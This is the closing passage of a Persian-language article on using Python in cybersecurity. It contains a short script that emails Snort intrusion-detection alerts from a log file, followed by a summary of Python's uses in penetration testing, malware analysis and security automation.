import smtplib

log_file = "/var/log/snort/alert.log"

def check_snort_alerts():
    with open(log_file, "r") as f:
        logs = f.readlines()

    for line in logs:
        if "ALERT" in line:
            send_email_alert(line)

def send_email_alert(alert_message):
    server = smtplib.SMTP("smtp.example.com", 587)
    server.starttls()
    server.login("[email protected]", "your_password")
    message = f"Subject: Snort Alert\n\n{alert_message}"
    server.sendmail("[email protected]", "[email protected]", message)
    server.quit()

check_snort_alerts()

✅ کاربرد:

• خودکارسازی نظارت بر هشدارهای Snort
• ارسال ایمیل هشدار در صورت وقوع حملات
• افزایش سرعت واکنش به تهدیدات شبکه‌ای

پایتون یک ابزار قدرتمند برای خودکارسازی امنیت سایبری است که می‌تواند بسیاری از کارهای امنیتی را بهینه کند. برخی از مهم‌ترین کاربردهای آن شامل اسکن آسیب‌پذیری‌ها، بررسی لاگ‌ها، شناسایی بدافزارها، تشخیص تهدیدات شبکه و پاسخگویی سریع به حملات است.

با استفاده از خودکارسازی، تیم‌های امنیتی می‌توانند به‌جای صرف زمان برای کارهای تکراری، روی تحلیل‌های پیچیده و استراتژی‌های امنیتی تمرکز کنند.

نتیجه‌گیری و خلاصه مقاله

پایتون به دلیل سادگی، کتابخانه‌های قدرتمند و قابلیت‌های گسترده، یکی از محبوب‌ترین زبان‌ها در دنیای امنیت سایبری محسوب می‌شود. در این مقاله، بررسی کردیم که چرا پایتون برای امنیت سایبری مناسب است و چگونه می‌توان از آن برای تست نفوذ، تحلیل بدافزار، خودکارسازی امنیت و سایر حوزه‌های مرتبط استفاده کرد.

🔹 خلاصه نکات کلیدی مقاله

✅ چرا پایتون برای امنیت سایبری مناسب است؟
پایتون با دارا بودن کتابخانه‌های متعدد، جامعه کاربری قوی و قابلیت نوشتن اسکریپت‌های ساده و سریع، ابزاری ایده‌آل برای تحلیل تهدیدات سایبری، شناسایی آسیب‌پذیری‌ها و اجرای تست نفوذ است.

✅ ابزارهای مهم پایتونی در امنیت سایبری
ابزارهایی مانند Scapy، Nmap، Shodan، Volatility، Yara و PyCryptodome به متخصصان امنیت کمک می‌کنند تا شبکه‌ها، سیستم‌ها و بدافزارها را تحلیل کرده و تهدیدات را شناسایی کنند.

✅ تست نفوذ با پایتون
پایتون به متخصصان تست نفوذ کمک می‌کند تا با استفاده از اسکریپت‌های اختصاصی، تست‌های حمله‌ای مانند اسکن پورت‌ها، شناسایی آسیب‌پذیری‌های وب و اجرای حملات Brute-force را خودکار کنند.

✅ تحلیل بدافزار با پایتون
پایتون در تحلیل ایستا و پویا بدافزارها کاربرد دارد. با آن می‌توان رشته‌های مخفی در بدافزارها را استخراج کرد، ارتباطات شبکه‌ای مخرب را تحلیل کرد و بدافزارهای مبتنی بر پایتون را دی‌کامپایل و بررسی نمود.

✅ خودکارسازی امنیت با پایتون
پایتون امکان خودکارسازی فرآیندهای امنیتی مانند بررسی لاگ‌ها، تشخیص حملات، مسدود کردن IPهای مخرب، شناسایی بدافزارها و نظارت بر تهدیدات شبکه را فراهم می‌کند. این امر باعث افزایش سرعت واکنش به تهدیدات و کاهش خطای انسانی می‌شود.

🔹 نتیجه‌گیری نهایی

با توجه به نیاز روزافزون به امنیت سایبری و افزایش تهدیدات دیجیتال، داشتن ابزارهایی برای تحلیل، پیشگیری و مقابله با حملات بسیار حیاتی است. پایتون به دلیل انعطاف‌پذیری بالا، سادگی و جامعه پشتیبانی قوی، یک انتخاب ایده‌آل برای متخصصان امنیت سایبری است.

چه در حوزه تست نفوذ، چه در تحلیل بدافزار یا خودکارسازی امنیت، پایتون می‌تواند کارهای پیچیده را ساده کرده و فرآیندهای امنیتی را بهینه کند. یادگیری این زبان برای هر فردی که در حوزه امنیت سایبری فعالیت می‌کند، یک مزیت بزرگ محسوب می‌شود.